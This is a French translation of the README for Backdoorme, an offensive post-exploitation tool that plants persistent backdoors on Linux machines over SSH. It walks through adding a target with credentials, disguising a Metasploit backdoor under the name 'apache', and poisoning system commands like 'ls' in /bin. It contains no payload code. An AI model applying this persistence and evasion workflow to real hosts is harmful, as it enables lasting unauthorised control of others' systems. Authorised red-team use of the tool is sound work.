
utilitaire puissant d'auto-backdooring
Des outils comme metasploit sont excellents pour exploiter des ordinateurs, mais que se passe-t-il après avoir obtenu l'accès à un ordinateur ? Backdoorme répond à cette question en déployant une multitude de backdoors pour établir une persistance sur de longues périodes.
Une fois qu'une connexion SSH a été établie avec la cible, les points forts de Backdoorme peuvent se concrétiser. Malheureusement, Backdoorme n'est pas un outil pour obtenir un accès root - seulement pour conserver cet accès une fois qu'il a été obtenu.
Veuillez utiliser Backdoorme uniquement avec une autorisation explicite - ne piratez pas sans demander.
Backdoorme est divisé en deux parties : les backdoors et les modules.
Les backdoors sont de petits fragments de code qui écoutent sur un port et redirigent vers un interpréteur, comme bash. Il existe de nombreuses backdoors écrites dans différents langages pour offrir de la variété.
Les modules rendent les backdoors plus puissantes en les exécutant plus souvent, par exemple toutes les quelques minutes ou au démarrage de l'ordinateur. Cela aide à établir une persistance.
Démonstration :
Pour démarrer backdoorme, assurez-vous d'abord d'avoir les dépendances requises.
Pour Python 3.5+ :
$ sudo apt-get install python3 python3-pip python3-tk nmap
$ cd backdoorme/
$ virtualenv --python=python3.5 env
$ source env/bin/activate
(env) $ pip install -r requirements.txt
Pour Python 2.7 :
$ sudo python dependencies.py
Lancement de backdoorme :
$ python master.py
Pour ajouter une cible :
>> addtarget
Target Hostname: 10.1.0.2
Username: victim
Password: password123
+ Target 1 Set!
>>
Pour utiliser une backdoor, exécutez simplement le mot-clé "use".
>> use shell/metasploit
+ Using current target 1.
+ Using Metasploit backdoor...
(msf) >>
À partir de là, vous pouvez définir les options pertinentes pour la backdoor. Exécutez "show options" ou "help" pour voir la liste des paramètres pouvant être configurés. Pour définir une option, utilisez simplement le mot-clé "set".
(msf) >> show options
Backdoor options:
Option Value Description Required
------ ----- ----------- --------
name initd name of the backdoor False
...
(msf) >> set name apache
+ name => apache
(msf) >> show options
Backdoor options:
Option Value Description Required
------ ----- ----------- --------
name apache name of the backdoor False
...
Comme dans metasploit, les backdoors sont organisées par catégorie.
Chaque backdoor peut avoir des modules supplémentaires appliqués pour la rendre plus puissante. Pour ajouter un module, utilisez simplement le mot-clé "add".
(msf) >> add poison
+ Poison module added
Chaque module possède des paramètres supplémentaires personnalisables, et si "help" est réexécuté, vous pouvez voir ou définir ces options supplémentaires.
(msf) >> help
...
Poison module options:
Option Value Description Required
------ ----- ----------- --------
name ls name of command to poison False
location /bin where to put poisoned files into False
Les modules actuellement activés comprennent :
Backdoorme supporte plusieurs cibles différentes simultanément, organisées par numéro lors de leur saisie. Le noyau maintient une cible "courante", vers laquelle toute nouvelle backdoor sera dirigée par défaut. Pour changer manuellement de cible, ajoutez simplement le numéro de la cible après la commande : "use metasploit 2" préparera la backdoor metasploit contre la deuxième cible. Exécutez "list" pour voir la liste des cibles actuelles, si une connexion est ouverte ou fermée, et quelles backdoors et modules sont disponibles.
Backdoorme en est encore à ses débuts ! N'hésitez pas à contribuer au projet - il suffit de le forker, d'apporter vos modifications et de soumettre une pull request. Vous avez une idée pour une backdoor géniale ou quelque chose que nous pourrions améliorer ? Créez une issue et nous l'ajouterons dès que possible ! Veuillez nous envoyer un email à [email protected] pour toute question.
Si vous souhaitez ajouter votre propre backdoor, suivez les instructions données dans le fichier backdoorme/backdoors/template.py.
Si vous souhaitez ajouter votre propre module, suivez les instructions données dans le fichier backdoorme/modules/template.py.
Aide-mémoire pour les développeurs :